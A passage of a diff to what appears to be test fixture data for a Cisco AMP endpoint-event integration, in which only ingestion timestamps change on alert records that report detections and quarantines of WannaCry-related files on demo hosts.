pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -2990,7 +2990,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763980600Z", + "ingested": "2021-12-14T14:40:45.520870519Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -3066,7 +3066,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763984300Z", + "ingested": "2021-12-14T14:40:45.520870928Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -3167,7 +3167,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764004700Z", + "ingested": "2021-12-14T14:40:45.520871377Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3270,7 +3270,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764011100Z", + "ingested": "2021-12-14T14:40:45.520871771Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3348,7 +3348,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764074200Z", + "ingested": "2021-12-14T14:40:45.520872178Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -3420,7 +3420,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764078800Z", + "ingested": "2021-12-14T14:40:45.520872564Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", @@ -3508,7 +3508,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764083500Z", + "ingested": "2021-12-14T14:40:45.520872952Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -3598,7 +3598,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764088400Z", + "ingested": "2021-12-14T14:40:45.520873394Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -3695,7 +3695,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764094300Z", + "ingested": "2021-12-14T14:40:45.520873812Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3796,7 +3796,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764098800Z", + "ingested": "2021-12-14T14:40:45.520874264Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3886,7 +3886,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764104Z", + "ingested": "2021-12-14T14:40:45.520874963Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3972,7 +3972,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764110200Z", + "ingested": "2021-12-14T14:40:45.520875458Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", @@ -4071,7 +4071,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764116300Z", + "ingested": "2021-12-14T14:40:45.520875846Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -4174,7 +4174,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764122900Z", + "ingested": "2021-12-14T14:40:45.520876445Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -4244,7 +4244,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:39.764129Z", + "ingested": "2021-12-14T14:40:45.520876867Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -4300,7 +4300,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:39.764151Z", + "ingested": "2021-12-14T14:40:45.520877283Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy 